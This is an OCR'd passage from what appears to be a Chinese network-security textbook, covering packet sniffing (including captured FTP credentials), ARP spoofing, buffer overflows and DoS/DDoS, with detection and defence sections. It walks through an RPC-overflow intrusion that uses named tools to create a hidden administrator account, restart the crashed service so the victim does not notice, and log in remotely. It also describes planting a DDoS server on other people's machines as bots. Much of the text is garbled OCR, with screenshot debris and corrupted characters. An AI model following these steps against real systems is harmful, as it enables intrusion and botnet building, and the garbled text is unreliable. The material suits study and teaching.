诊断 间 题 、 实 时 监控 网 络 活动 (网 络 监视 )、 收 集 网 络 利用 率 和 错误 等 。 下 面 主要 介绍 报 文 
捕获 和 网 络 监视 。 


1. 报 文 捕获 


在 进行 报 文 捕获 之 前 首先 选择 网 络 适 配器 ， 确 定 从 计算 机 的 哪个 网 络 适配器 上 接收 数 
据 。 选 择 File 一 Settings 菜单 命令 ， 弹 出 如 图 3-12 所 示 的 对 话 框 ， 在 其 中 选择 网 络 适 
配器 。 


EC 





图 3-12 选择 网 络 适 配器 
报 文 捕获 功能 可 以 在 报 文 捕获 面板 中 进行 设置 ， 捕 获 面板 如 图 3-13 所 示 。 




















图 3-13 捕获 面板 


在 捕获 过 程 中 ， 可 以 通过 如 图 3-14 所 示 面 板 查看 捕获 报 文 的 数量 和 缓冲 区 的 利用 率 。 
选择 Capture 一 Capture Panel 菜单 命令 ， 可 以 打开 如 图 3-14 所 示 面 板 。 
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捕获 报 文 的 数 
据 缓冲 大 小 


详细 统计 信息 














3-14 ”捕获 面板 


Sniffer Pro 软件 提供 了 强大 的 分 析 能 力 和 解码 功能 。 如 图 3-15 所 示 ， 对 于 捕获 的 报 文 
提供 了 一 个 Expert 专家 分 析 系 统 进 行 分 析 ， 还 有 解码 选项 及 图 形 和 表格 的 统计 信息 。 进 行 
捕获 后 ， 单 击 “ 捕 获 停止 并 查看 ”按钮 ， 可 以 调 出 如 图 3-15 所 示 的 窗口 。 





4jSnif2: Expert, 3803 Ethernet Eranes 


到 测 到 到 


[10. 11. 105.99] ) 





( [10.11.105.56] ) 
( [10.11.105.56] ) 
( [10.11.105.58] ) 






582DH ( [10.11. 105.97] ) 


























图 3-15 专家 分 析 系 统 
可 以 自行 设置 捕获 条 件 ， 分 为 基本 捕获 条 件 、 高 级 捕获 条 件 和 人 


E 意 捕获 条 件 。 
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1) 基本 捕获 条 件 


基本 捕获 条 件 有 两 种 ， 选 择 Capture 一 Define Filter 菜单 命令 ， 在 Define Filter 对 话 框 
的 Address 选项 卡 下 设置 捕获 条 件 ， 如 图 3-16 所 示 。 

(1) 链 路 层 捕获 : 按 源 MAC 和 目的 MAC 地 址 进行 捕获 ， 输 入 方式 为 十 六 进 制 连续 输 
入 ， 如 00e0fc123456。 

(2) IP 层 捕 获 : 按 源 全 和 目的 IP 进行 捕获 。 输 入 方式 为 点 间隔 方式 ， 如 10.107.1.1。 如 
果 选 择 人 P 层 捕获 条 件 ， 则 ARP 等 报 文 将 被 过 滤 掉 。 





Sannay 人 dirwss | Data Tattern| Mavenced| 3affer| SelngsFor 
Bddrass Jewn Addrors: (ragable) 

















3-16 ”基本 捕获 条 件 


2) 高 级 捕获 条 件 
在 Advanced 选项 卡 ， 可 以 编辑 协议 捕获 条 件 ， 如 图 3-17 所 示 。 


Dofine Filter a 


Summary | Madzsss | Dats Pattera Advanead | Ette | 

















图 3-17 高 级 捕获 条 件 


3) ”任意 捕获 条 件 
在 Data Patternt 选项 卡 ， 可 以 编辑 任意 捕获 条 件 ， 如 图 3-18 所 示 。 
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Define Filter 


Sunmary | Address Data Pattern |Advanced | Buffer | 


Station Huaxei001105 
= Station Huawei001105 









添加 关系 
关 
Aad AND/OR | Tosele Amyog| Add NOT 
Delete FEvaluate 


| ] 取消 | Profiles... 


TOE WT 


















3-18 ”任意 捕获 条 件 


用 这 种 方法 可 以 实现 复杂 的 报 文 过 滤 ， 但 很 多 时 候 是 得 不 偿 失 ， 截 获 的 报 文本 不 多 ， 
还 不 如 自己 看 看 来 得 快 。 

2. 网 络 监视 

网 络 监视 功能 能 够 时 刻 监视 网 络 统计 、 网 络 上 资源 的 利用 率 ， 并 能 够 监视 网 络 流量 的 
异常 状况 ， 在 这 里 主要 介绍 Dashboard。 

Dashboard 可 以 监控 网 络 的 利用 率 ， 流 量 及 错误 报 文 等 内 容 。 通 过 应 用 软件 可 以 清楚 
看 到 此 功能 ， 选 择 Monitor 一 Dashboard 菜单 命令 ， 弹 出 如 图 3-19 所 示 的 Dashboard 窗口 。 

Wireshark( 前 称 Ethereal) 是 一 个 网 络 封 包 分 析 软 件 。 网 络 封包 分 析 软 件 的 功能 是 搬 取 网 
络 封包 ， 并 尽 可 能 显示 出 最 为 详细 的 网 络 封包 资料 。Wireshark 的 界面 如 图 3-20 所 示 。 


























图 3-19 Dashboard 
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选择 Capture 一 Start 菜单 命令 ， 就 会 出 现 所 捕获 的 数据 包 的 统计 。 想 停止 时 ， 单 击 捕 
捉 信 息 对 话 框 上 的 Stop 按钮 停止 。 使 用 Wireshark 截获 了 一 些 FTP 登录 过 程 的 数据 包 ， 如 


图 3-21 所 示 。 


Ele Et Wew Go Capture snahze Statstcs Help 
waoau ox*。 .2 8.»“oT 1 国 国 «a a 
> Epession. Clear Apply 


Elmer 


195. 168. 310. 160 


192.168.210.111 








3-21 ”Wireshark 截获 的 数据 包 


由 于 FTP 是 明文 传递 消息 的 ， 所 以 在 截获 的 数据 包 中 还 能 看 到 FTP 登录 的 用 户 名 和 
密码 ， 如 图 3-22 和 图 3-23 所 示 。 





| Ele Edt View Go Capture Anahze Statistics Help 
BaaAuloxY%6l8H.*%TF21| 国 国 @ a 

















I92.168.210.160 192.168.210.111 ponse: 220 Welcome to JDFW FTP Server V4.0 国 
I92.168.210.111 192.168.210.160 Request: USER 14sf 

92.168.310.111 133.168.210.160 FTP liCP Out-Of-Order] Request: USER 145T 

[92. 111 192.1 .0.160 .TCP Out- 
92.168.210.111 192.168.210.160 [TcP Out: 
92.168-210.160 192.168.210-111 


4 


of -Order] Request: USEI 
-Of-Order] Request: USER 14sf 
Response: 331 Password required for 14sf 





= ms 











3-22 ”FTP 登录 的 用 户 名 
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国 Wntited) -Wirespatk 重 - ee 
Ele Edt Vew Go Capture Analyze Statistics Help 


凡 半 情人 Dx%alBHe»% Ti 国 国 & a 























Elerfp > Expression. Clear Apply 





92.168.210.111 192.168.210.160 
|92.168. 210.111 192.168.210.160 
|92.168. 210.111 192.168. 210.160 
|92.168. 210.160 192.168. 210.111 
|92.168.210.111 192.168.210.160 
|92.168. 210.111 。 192.168.210.160 





ut -OT -Order | Request: PASS 123 
t-Of -Order] Request: PASS 123 

[TcP out-of-order] Request: PASS 123 

Response: 230 Client :14sf successfully 1ogged 

Request: opts utf8 on 

[TcP Out-of-Order] Request: opts utf8 on 


3333 引 e 





图 3-23 ”FTP 登录 的 密码 
3.4.3 ”检测 和 防护 


网 络 监听 是 很 难 被 发 现 的 ， 因 为 运行 网 络 监听 的 主机 只 是 被 动 地 接收 在 局 域 网 上 传输 


的 信息 ， 不 主动 地 与 其 他 主机 交换 信息 ， 也 没有 修改 在 网 上 传输 的 数据 包 。 
1. 对 可 能 存在 的 网 络 监听 的 检测 


(1) 对 于 怀疑 运行 监听 程序 的 机 器 ， 用 正确 的 瑟 地 址 和 错误 的 物理 地 址 执行 ping 命 
令 ， 运 行 监听 程序 的 机 器 会 有 响应 。 这 是 因为 正常 的 机 器 不 接收 错误 的 物理 地 址 ， 处 于 监 


听 状 态 的 机 器 能 接收 ， 但 如 果 它 的 IPstack 不 再 次 反 向 检查 的 话 ， 就 会 响应 。 


(2) 向 网 上 发 大 量 不 存在 的 物理 地 址 的 包 ， 由 于 监听 程序 要 分 析 和 处 理 大 量 的 数据 包 
会 占用 很 多 的 CPU 资源 ， 这 将 导致 性 能 下 降 ， 通 过 比较 该 机 器 前 后 性 能 可 加 以 判断 。 这 


种 方法 难度 比较 大 。 
(3) 使 用 反 监 听 工 具 如 Antisniffer 等 进行 检测 。 


2. 对 网 络 监 听 的 防范 措施 
1) 从 逻辑 或 物理 上 对 网 络 分 段 


网 络 分 段 通 常 被 认为 是 控制 网 络 广播 风暴 的 一 种 基本 手段 ， 但 其 实 也 是 保证 网 络 安全 
的 一 项 措施 。 其 目的 是 将 非法 用 户 与 敏感 的 网 络 资源 相互 隔离 ， 从 而 防止 可 能 的 非法 监听 。 


2) 以 交换 式 集线器 代 蔡 共享 式 集线器 


对 局 域 网 的 中 心 交换 机 进行 网 络 分 段 后 ， 局 域 网 监听 的 危险 仍然 存在 。 这 是 因为 网 络 
最 终 用 户 的 接 入 往往 是 通过 分 支 集线器 而 不 是 中 心 交换 机 ， 而 使 用 最 广泛 的 分 支 集线器 通 
常 是 共享 式 集线器 。 这 样 ， 当 用 户 与 主机 进行 数据 通信 时 ， 两 台 机 器 之 间 的 数据 包 ( 称 为 单 


播 包 ，Unicast Packet) 还 是 会 被 同一 台 和 集线器 上 的 其 他 用 户 所 监听 。 


因此 ， 应 该 以 交换 式 集线器 代替 共享 式 集线器 ， 使 单 播 包 仅 在 两 个 节点 之 间 传 送 ， 从 
而 防止 非法 监听 。 当 然 ， 交 换 式 集线器 只 能 控制 单 播 包 而 无 法 控制 广播 包 (Broadcast Packet) 


和 多 播 包 (Multicast PackeD。 但 广播 包 和 多 播 包 内 的 关键 信息 ， 要 远 远 少 于 单 播 包 。 
3) 使 用 加 密 技 术 


数据 经 过 加 密 后 ， 通 过 监听 仍然 可 以 得 到 传送 的 信息 ， 但 显示 的 是 乱码 。 使 用 加 密 技 
术 的 缺点 是 影响 数据 传输 速度 以 及 使 用 一 个 弱 加 密 术 比较 容易 被 攻破 。 系 统管 理 员 和 用 户 


需要 在 网 络 速度 和 安全 性 上 进行 折 中 。 
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4) 划分 VLAN 
运用 VLAN( 虚 拟 局 域 网 ) 技 术 ， 将 以 太 网 通信 变 为 点 到 点 通信 ， 可 以 防止 大 部 分 基于 
网 络 监听 的 入 侵 。 





























3.5_ARP 欺骗 
3.5.1 原理 


互联 网 的 发 展 很 大 程度 上 归功 于 TCP/IP 协议 运行 的 高 效 性 和 开放 性 ， 然 而 TCP/IP 协 
议 在 实现 过 程 中 忽略 了 对 网 络 安全 方面 的 考虑 ， 致 使 其 存在 着 较 多 安全 隐患 。ARP 协议 是 
TCP/IP 协议 中 重要 的 一 员 ， 其 功能 主要 是 为 局 域 网 内 网 络 设备 提供 IP 地 址 向 硬件 地 址 的 
转化 ， 其 设计 建立 在 局 域 网 内 网 络 设备 之 间 相 互信 任 的 基础 上 ， 由 此 产生 了 许多 ARP 欺 
骗 攻 击 方法 。 许 多 木马 和 病毒 利用 ARP 协议 这 一 设计 上 的 漏洞 在 局 域 网 内 进行 ARP 欺骗 
攻击 ， 给 局 域 网 的 安全 造成 了 严重 威胁 。 

ARP 意 为 地 址 解析 协议 ， 即 Address Resolution Protocol， 是 根据 他 地 址 获取 物理 地 址 
的 一 个 TCP/IP 协议 。 主 机 发 送信 息 时 ， 将 包含 目标 IP 地 址 的 ARP 请 求 广播 到 网 络 上 的 所 
有 主机 ， 并 接收 返回 消息 ， 以 此 确定 目标 的 物理 地 址 ， 收 到 返回 消息 后 ， 将 该 他 地 址 和 物 
理 地 址 存 入 本 机 ARP 缓存 中 并 保留 一 定时 间 ， 下 次 请 求 时 直接 查询 ARP 缓存 以 节约 资 
源 。 地 址 解析 协议 是 建立 在 网 络 中 各 个 主机 互相 信任 的 基础 上 ， 网 络 上 的 主机 可 以 自主 发 
送 ARP 应 答 消息 ， 其 他 主机 收 到 应 答 报 文 时 不 会 检测 该 报 文 的 真实 性 就 会 将 其 记 入 本 机 
ARP 缓存 ， 由 此 攻击 者 就 可 以 向 某 一 主机 发 送 伪 ARP 应 答 报 文 ， 使 其 发 送 的 信息 无 法 到 
达 预 期 的 主机 或 到 达 错 误 的 主机 ， 这 就 构成 了 一 个 ARP 欺骗 。 

在 每 台 安装 有 TCP/IP 协议 的 电脑 里 都 有 一 个 ARP 缓存 表 ， 表 里 的 他 地 址 与 MAC 地 
址 是 一 一 对 应 的 ， 如 图 3-24 所 示 。 


而 管理 员 : CWWindows\system3Z\emd exe Eo 



































图 3-24 ARP 缓存 表 
这 里 以 主机 A(192.168.1.5) 向 主机 B(192.168.1.1) 发 送 数据 为 例 介 绍 ARP 工作 原理 。 当 发 





Hu HH 


送 数据 时 ， 主 机 A 会 在 自己 的 ARP 缓存 表 中 寻找 是 否 有 目标 卫 地 址 。 如 果 找 到 了 ， 也 就 知 
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道 了 目标 MAC 地 址 ， 直 接 把 目标 MAC 地 址 写 入 帧 里 面 发 送 就 可 以 了 ; 如 果 在 ARP 缓存 表 
中 没有 找到 相对 应 的 全 地 址 ， 主 机 A 就 会 在 网 络 上 发 送 一 个 广播 ， 目标 MAC 地 址 是 
FF.FF.FF.FF.FFFF， 这 表示 向 同一 网 段 内 的 所 有 主机 发 出 这 样 的 询问 : “192.168.1.1 的 
MAC 地 址 是 什么 ? ”网 络 上 其 他 主机 并 不 响应 ARP 询问 ， 只 有 主机 B 接收 到 这 个 帧 时 ， 
才 向 主机 A 做 出 这 样 的 回应 ; “192.168.1.1 的 MAC 地 址 是 00-aa-00-62-c6-09”。 这 样 ， 
主机 A 就 知道 了 主机 B 的 MAC 地 址 ， 它 就 可 以 向 主机 B 发 送信 息 了 。 同 时 它 还 更 新 了 自 
己 的 ARP 缓存 表 ， 下 次 再 向 主机 B 发 送信 息 时 ， 直 接 从 ARP 缓存 表 里 查 找 。ARP 缓存 表 
采用 了 老化 机 制 ， 在 一 段 时 间 内 如 果 表 中 的 某 一 行 没 有 使 用 ， 就 会 被 删除 ， 这 样 可 以 大 大 
减少 ARP 缓存 表 的 长 度 ， 加 快 查询 速度 。 

ARP 欺骗 可 以 造成 内 部 网 络 的 混乱 ， 某 些 被 欺骗 的 计算 机 无 法 正常 访问 内 外 网 ， 让 网 
关 无 法 和 客户 端正 常 通信 。 实 际 上 ， 它 的 危害 还 不 仅仅 如 此 。 一 般 来 说 ，IP 地 址 的 冲突 可 
以 通过 多 种 方法 和 手段 来 避免 ， 而 ARP 协议 工作 在 更 低层 ， 隐 蔽 性 更 高 。 系 统 并 不 会 判 
断 ARP 缓存 正确 与 否 ， 无 法 像 卫 地 址 冲突 那样 给 出 提示 。 而 且 ， 很 多 黑客 工具 可 以 随时 
发 送 ARP 欺骗 数据 包 和 ARP 恢复 数据 包 ， 这 样 就 可 以 实现 在 一 台 普 通 计算 机 上 通过 发 送 
ARP 数据 包 的 方法 来 控制 网 络 中 任何 一 台 计 算 机 的 网 络 连接 ， 截 获 其 通信 数据 并 加 入 病毒 
代码 进行 传播 ， 甚 至 还 可 以 直接 对 网 关 进 行 攻击 ， 让 所 有 连接 网 络 的 计算 机 都 无 法 正常 上 
网 。 这 点 在 以 前 是 不 可 能 的 ， 因 为 普通 计算 机 没有 管理 权限 来 控制 网 关 。ARP 欺骗 的 危害 
是 巨大 的 ， 而 且 非 常 难 对 付 ， 非 法 用 户 和 恶意 用 户 可 以 随时 发 送 ARP 欺骗 和 恢复 数据 
包 ， 这 样 就 增加 了 网 络 管理 员 查 找 攻 击 源 的 难度 。 

归纳 ARP 欺骗 类 攻击 的 危害 性 如 下 。 

(1) 攻击 点 范围 广 : 不 需要 攻占 具体 服务 器 ， 在 不 获得 目标 主机 的 权限 的 条 件 下 ， 只 
要 在 网 络 环境 的 任何 一 个 点 上 安放 一 台 “ 肉 机 ” 便 可 以 感染 整个 网 段 。 

(2) 攻击 非常 隐蔽 : 不 需要 改动 任何 目标 主机 的 页 面 或 者 是 配置 ， 在 网 络 传输 的 过 程 
中 直接 插入 病毒 的 代码 。 

(3) 发 现 困 难 : 如 没有 机 房 网 络 管理 人 员 协 助 协查 ， 服 务 器 系统 管理 员 光 靠 系统 日 志 
无 法 在 短 时 间 内 找到 攻击 源 。 

(4) 恢复 复杂 : 网 站 管理 员 即 使 发 现 被 攻击 ， 但 是 从 系统 层面 上 无 法 自己 清除 。 

(5) 攻击 手段 变化 多 样 : 黑客 可 以 最 大 化 地 利用 ARP 欺骗 ， 将 其 与 其 他 攻击 方法 组 合 
后 运用 于 多 种 攻击 ， 如 侦 听 、 拒 绝 服务 、 挂 载 病毒 ， 从 而 实现 多 种 攻击 目的 。 


3.5.2 工具 


Cain & Abel 是 由 Oxid.it 开发 的 一 个 针对 Microsoft 操作 系统 的 免费 口令 恢复 工具 ， 号 
称 穷人 使 用 的 LOphtcrack。 它 的 功能 十 分 强大 ， 可 以 网 络 嗅 探 、 网 络 欺骗 、 破 解 加 密 口 
令 、 解 码 被 打 乱 的 口令 、 显 示 口 令 框 、 显 示 缓 存 口令 和 分 析 路 由 协议 ， 甚 至 还 可 以 监听 内 
网 中 他 人 使 用 VOIP 拨打 电话 。 Abel 是 后 台 服 务 程 序 ， 一 般 不 会 用 到 ， 在 3.8.2 节 中 我 们 
重点 来 介绍 Cain 的 使 用 。 
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3.5.3 防护 


从 ARP 攻击 原理 可 以 看 出 ， 防 范 ARP 欺骗 攻击 最 大 困难 在 于 其 攻击 不 是 针对 服务 器 
或 交换 机 系统 本 身 的 ， 而 且 攻 击 源 可 以 在 网 段 内 任何 一 个 地 方 隐藏 ， 其 隐蔽 性 很 高 。 所 以 
有 时 候 即 使 发 现 了 攻击 的 存在 ， 要 在 最 短 时 间 内 快速 定位 攻击 源 也 是 非常 困难 的 事情 。 这 
就 意味 着 像 防治 普通 攻击 或 病毒 那样 单纯 从 服务 器 系统 或 者 从 网 络 网 关上 进行 防范 效果 不 
是 很 好 。 因 此 ，ARP 攻击 防范 策略 需要 从 三 方面 同时 入 手 : 计算 机 系统 安全 加 固 、MAC- 
ARP 对 应 表 管 理 、 网 络 非法 ARP 包 探测 。 

(1) 设置 静态 的 MAC TO IP 对 应 表 ， 并 防止 黑客 刷新 静态 转换 表 。 不 要 把 网 络 安全 信 
任 关 系 建立 在 IP 基础 上 或 MAC 基础 上 ， 尽 量 将 信任 关系 建立 在 IPHMAC 上 。 

(2) 使 用 MAC 地 址 管理 服务 器 。 通 过 该 服务 器 查找 自己 的 ARP 转换 表 来 响应 其 他 机 
器 的 ARP 广播 。 

(3) 使 用 代理 卫 的 传输 。 

(4) 使 用 防火 墙 隔离 非 信任 域 对 内 网 机 器 的 ARP 包 传输 。 

(5) 定期 使 用 RARP 请 求 来 检查 ARP 响应 的 真实 性 。 

(6) 定期 轮 询 检查 主机 上 的 ARP 缓存 。 

(7) 使 用 防火 墙 连续 监控 网 络 。 

(8) 使 用 ARP 探测 工具 ， 在 网 络 上 探测 非法 ARP 广播 数据 帧 。 


3.6 ”缓冲 区 溢出 
3.6.1 原理 


缓冲 区 是 内 存 中 存放 数据 的 地 方 。 在 程序 试图 将 数据 放 到 机 器 内 存 中 的 某 一 个 位 置 
时 ， 如 果 没 有 足够 的 空间 就 会 发 生 缓冲 区 溢出 。 而 人 为 的 溢出 则 是 有 一 定 企图 的 ， 攻 击 者 
写 一 个 超过 缓冲 区 长 度 的 字符 串 ， 植 入 到 缓冲 区 ， 然 后 再 向 一 个 有 限 空间 的 缓冲 区 中 植 入 
超 长 的 字符 串 ， 这 时 可 能 会 出 现 两 个 结果 : 一 是 过 长 的 字符 串 覆 盖 了 相 邻 的 存储 单元 ， 引 
起 程序 运行 失败 ， 严 重 的 可 导致 系统 崩 演 ， 另 一 个 结果 就 是 利用 这 种 漏洞 可 以 执行 任意 指 
令 ， 甚 至 可 以 取得 系统 管理 员 权限 。 

缓冲 区 是 程序 运行 的 时 候 机 器 内 存 中 的 一 个 连续 块 ， 它 保存 了 给 定 类 型 的 数据 ， 在 有 
动态 分 配 变量 时 可 能 会 出 现 问题 。 大 多 时 为 了 不 占用 太 多 的 内 存 ， 一 个 有 动态 分 配 变 量 的 
程序 在 程序 运行 时 才 决 定 给 它们 分 配 多 少 内 存 。 如 果 程 序 在 动态 分 配 缓冲 区 放 入 超 长 的 数 
据 ， 它 就 会 溢出 了 。 一 个 缓冲 区 溢出 程序 使 用 这 个 溢出 的 数据 将 汇编 语言 代码 放 到 机 器 的 
内 存 里 ， 通 常 是 产生 管理 员 权限 的 地 方 。 仅 仅 单个 的 缓冲 区 溢出 并 不 是 问题 的 根本 所 在 。 
但 如 果 溢 出 送 到 能 够 以 管理 员 权限 运行 命令 的 区 域 ， 一 旦 运行 这 些 命令 ， 产 生 涪 出 的 机 器 
将 会 完全 被 控制 。 
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3.6.2 方法 


缓冲 区 溢出 漏洞 可 以 使 任何 一 个 有 黑客 技术 的 人 取得 机 器 的 控制 权 甚 至 是 最 高 权限 。 
黑客 要 达到 目的 通常 需 完成 两 个 任务 ， 一 是 在 程序 的 地 址 空间 里 安排 适当 的 代码 ， 二 是 通 
过 适当 的 初始 化 寄存 器 和 存储 器 让 程序 跳 转 到 安排 好 的 地 址 空间 执行 。 

1. 在 程序 的 地 址 空间 里 安排 适当 的 代码 

在 程序 的 地 址 空间 里 安排 适当 的 代码 往往 是 相对 简单 的 。 如 果 要 攻击 的 代码 在 所 攻击 
程序 中 已 经 存在 了 ， 那 么 就 简单 地 对 代码 传递 一 些 参 数 ， 然 后 使 程序 跳 转 到 目标 中 就 可 以 
完成 了 。 

2. 控制 程序 转移 到 攻击 代码 的 形式 

缓冲 区 溢出 漏洞 攻击 都 是 在 寻求 改变 程序 的 执行 流程 ， 使 它 跳 转 到 攻击 代码 ， 最 为 基 
本 的 就 是 溢出 一 个 没有 边界 检查 或 者 其 他 漏洞 的 缓冲 区 ， 这 样 就 会 扰乱 程序 的 正常 执行 次 
序 。 通 过 溢出 某 缓冲 区 ， 可 以 改写 相近 程序 的 空间 而 直接 跳 转 过 系统 对 身份 的 验证 。 原 则 
上 来 讲 ， 攻 击 时 所 针对 的 缓冲 区 溢出 的 程序 空间 可 为 任意 空间 。 

3. 植 入 综合 代码 和 流程 控制 

常见 的 溢出 缓冲 区 攻击 类 是 在 一 个 字符 串 里 综合 了 代码 植 入 和 活动 记录 技术 。 攻 击 时 
定位 在 一 个 可 供 溢 出 的 自动 变量 ， 然 后 向 程序 传递 一 个 很 大 的 字符 串 ， 在 引发 缓冲 区 溢出 
改变 活动 记录 的 同时 植 入 代码 。 植 入 代码 和 缓冲 区 溢出 不 一 定 要 一 次 性 完成 ， 可 以 在 一 个 
缓冲 区 内 放置 代码 (这 个 时 候 并 不 能 溢出 缓冲 区 )， 然 后 通过 溢出 另 一 个 缓冲 区 来 转移 程序 
的 指针 。 这 样 的 方法 一 般 是 用 于 可 供 溢出 的 缓冲 区 不 能 放 入 全 部 代码 时 的 情况 。 

缓冲 区 溢出 是 一 种 非常 普遍 、 非 常 危 险 的 漏洞 ， 在 各 种 操作 系统 、 应 用 软件 中 广泛 存 
在 。 利 用 缓冲 区 溢出 攻击 ， 可 以 导致 程序 运行 失败 、 系 统 宕 机 、 重 新 启动 等 后 果 。 更 为 严 
重 的 是 ， 可 以 利用 它 执 行 非 授 权 指 令 ， 甚 至 可 以 取得 系统 特权 ， 进 而 进行 各 种 非法 操作 。 

下 面 介绍 一 个 利用 RPC 漏洞 建立 超级 用 户 的 实例 。 首 先 利 用 工具 scanms.exe 文件 检 
测 局 域 网 内 一 个 网 段 的 RPC 漏洞 。 输 入 scanms.exe ip 命令 ， 查 看 该 卫 地 址 显示 出 
“[VULN]”， 说 明 存 在 该 漏洞 ， 如 图 3-25 所 示 。 
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图 3-25 检测 RPC 溢出 漏洞 
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利用 工具 软件 attack.exe 对 有 RPC 漏洞 的 了 P 地 址 进行 攻击 ， 攻 击 的 结果 是 在 对 方 计算 
机 上 建立 一 个 具有 管理 员 权限 的 用 户 ( 新 建 用 户 的 用 户 名 和 密码 都 是 qing10)， 并 终止 了 对 
方 的 RPC 服务 ， 如 图 3-26 所 示 。 








图 3-26 RPC 溢出 攻击 
由 于 RPC 服务 终止 ， 容 易 使 被 攻击 方 觉察 到 异常 。 此 时 使 用 工具 软件 OpenRpcss.exe 


来 给 对 方 重启 RPC 服务 。 如 果 对 方 开 启 了 远程 桌面 服务 ， 可 以 使 用 远程 桌面 登录 对 方 机 
器 ， 如 图 3-27 所 示 。 























图 3-27 远程 登录 


3.6.3 防护 


目前 有 4 种 基本 的 方法 保护 缓冲 区 免 受 缓冲 区 溢出 攻击 和 影响 。 
1. 强制 编写 正确 的 代码 


编写 正确 的 代码 是 一 件 非 常 有 意义 但 耗 时 的 工作 ， 特 别 像 编 写 C 语言 那 种 容易 出 错 的 
程序 (如 字符 串 的 零 结尾 )， 这 种 风格 是 由 于 追求 性 能 而 忽视 正确 性 的 传统 引起 的 。 


2. 通过 操作 系统 使 得 缓冲 区 不 可 执行 ， 从 而 阻止 攻击 者 植 入 攻击 代码 

这 种 方法 有 效 地 阻止 了 很 多 缓冲 区 溢出 的 攻击 。 但 是 攻击 者 并 不 一 定 要 植 入 攻击 代码 
来 实现 缓冲 区 溢出 的 攻击 ， 所 以 这 种 方法 还 是 存在 很 多 弱点 的 。 

3. 利用 编译 器 的 边界 检查 来 实现 缓冲 区 的 保护 

这 个 方法 使 得 缓冲 区 溢出 不 可 能 出 现 ， 从 而 完全 消除 了 缓冲 区 溢出 的 威胁 ， 但 是 相对 
而 言 代价 比较 大 。 











no 区 >》 计算 机 网 络 安全 教程 


4. 在 程序 指针 失效 前 进行 完整 性 检查 


虽然 这 种 方法 不 能 使 得 所 有 的 缓冲 区 溢出 失效 ， 但 它 的 确 阻止 了 绝 大 多 数 的 缓冲 区 涪 
出 攻击 ， 而 能 够 逃脱 这 种 方法 保护 的 缓冲 区 溢出 也 很 难 实现 。 


3.7 ”拒绝 服务 攻击 
3.7.1 原理 


拒绝 服务 攻击 ， 又 称 为 DoS(Denial of Service 的 缩写 ) 攻 击 。DoS 的 攻击 方式 有 很 多 
种 ， 最 基本 的 就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ， 从 而 使 合法 用 户 无 法 得 到 
服务 的 响应 。 简 单 的 DoS 攻击 一 般 是 采用 一 对 一 方式 ， 当 攻击 目标 CPU 速度 低 、 内 存 小 
或 者 网 络 带宽 小 ， 它 的 效果 是 明显 的 。 随 着 计算 机 与 网 络 技术 的 发 展 ， 计 算 机 的 处 理 能 力 
迅速 增长 ， 内 存 大 大 增加 ， 同 时 也 出 现 了 千 兆 级 别 的 网 络 ， 这 使 得 DoS 攻击 的 困难 程度 加 
大 了 。 这 时 就 出 现 了 分 布 式 拒绝 服务 攻击 ， 又 称 为 DDoS(Distributed Denial of Service) 攻 
击 。DDoS 攻击 采取 增加 攻击 的 计算 机 ， 多 台 计算 机 同时 攻击 一 台 目标 计算 机 ， 从 而 达到 
攻击 的 目的 。 

DDoS 攻击 是 基于 DoS 攻击 的 一 种 特殊 形式 。 攻 击 者 将 多 台 受 控制 的 计算 机 联合 起 来 
向 目标 计算 机 发 起 DoS 攻击 ， 它 是 一 种 大 规模 协作 的 攻击 方式 ， 主 要 瞄准 比较 大 的 商业 站 
点 ， 具 有 较 大 的 破坏 性 。 

DDoS 攻击 由 攻击 者 、 主 控 端 和 代理 端 组 成 。 攻 击 者 是 整个 DDoS 攻击 发 起 的 源头 ， 
它 事先 已 经 取得 了 多 台 主 控 端 计算 机 的 控制 权 ， 主 控 端 计算 机 分 别 控制 着 多 台 代 理 端 计算 
机 。 在 主 控 端 计算 机 上 运行 着 特殊 的 控制 进程 ， 可 以 接收 攻击 者 发 来 的 控制 指令 ， 操 作 代 
理 端 计算 机 对 目标 计算 机 发 起 DDoS 攻击 。 

DDoS 攻击 之 前 ， 首 先 扫 描 并 入 侵 有 安全 漏洞 的 计算 机 并 取得 控制 权 ， 然 后 在 每 台 被 
入 侵 的 计算 机 中 安装 具有 攻击 功能 的 远程 遥控 程序 ， 用 于 等 待 攻击 者 发 出 入 侵 命 令 。 这 些 
工作 是 自动 、 高 速 完成 的 ， 完 成 后 攻击 者 会 消除 它 的 入 侵 痕迹 ， 系 统 的 正常 用 户 一 般 不 会 
察觉 。 之 后 攻击 者 会 继续 利用 已 控制 的 计算 机 扫描 和 入 侵 更 多 的 计算 机 。 重 复 执行 以 上 步 
又 ， 将 会 控制 越 来 越 多 的 计算 机 。 

Anutocrat 是 一 款 基于 TCP/IP 协议 的 DDoS 分 布 式 拒绝 服务 攻击 工具 ， 它 运用 远程 控制 
方式 联合 多 台 服 务 器 进行 DDoS 攻击 。Autocrat 包括 4 个 文件 : Server.exe( 服 务 器 端 )， 
Client.exe( 控 制 端 ， 用 它 操作 Autocrat)，Mswinsck.ocx( 控 制 端 需要 的 网 络 接口 )， 
Richtx32.ocx( 控 制 端 需要 的 文本 框 控件 )。 

既然 是 基于 远程 控制 的 工具 ， 必 须 用 一 切 办 法 把 Server.exe 放 到 别人 机 器 运行 。 运 行 
Server.exe 的 机 器 为 肉鸡 ， 后 会 自动 上 线 。Client 是 控制 Server 的 工具 ， 如 果 已 经 有 肉鸡 上 
线 ， 就 可 以 发 动 攻击 ， 如 图 3-28 所 示 。 
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图 3-28 DDoS 攻击 
3.7.2 手段 


拒绝 服务 攻击 是 一 种 对 网 络 危害 巨大 的 恶意 攻击 。 今 天 ，DoS 具有 代表 性 的 攻击 手段 
如 下 。 


1. 死亡 之 ping (ping of death) 


ICMP(Internet Control Message Protocol，Internet 控制 信息 协议 ) 在 Intemet 上 用 于 错误 
处 理 和 传递 控制 信息 。 最 普通 的 ping 程序 就 是 这 个 功能 。 在 TCP/IP 的 RFC 文档 中 ， 对 包 
的 最 大 尺寸 都 有 严格 限制 规定 ， 许 多 操作 系统 的 TCP/IP 协议 栈 都 规定 ICMP 包 大 小 为 
64KB， 且 在 对 包 的 标题 头 进行 读 取 之 后 ， 要 根据 该 标题 头 里 包含 的 信息 来 为 有 效 载荷 生成 
缓冲 区 。 死 亡 之 ping 就 是 故意 产生 畸形 的 测试 ping 包 ， 声 称 自己 的 尺寸 超过 ICMP 上 
限 ， 也 就 是 加 载 的 尺寸 超过 64KB 上 限 ， 使 未 采取 保护 措施 的 网 络 系统 出 现 内 存 分 配 错 
误 ， 导 致 TCP/IP 协议 栈 朋 溃 ， 最 终 接收 方 宕 机 。 

2. 泪 滴 

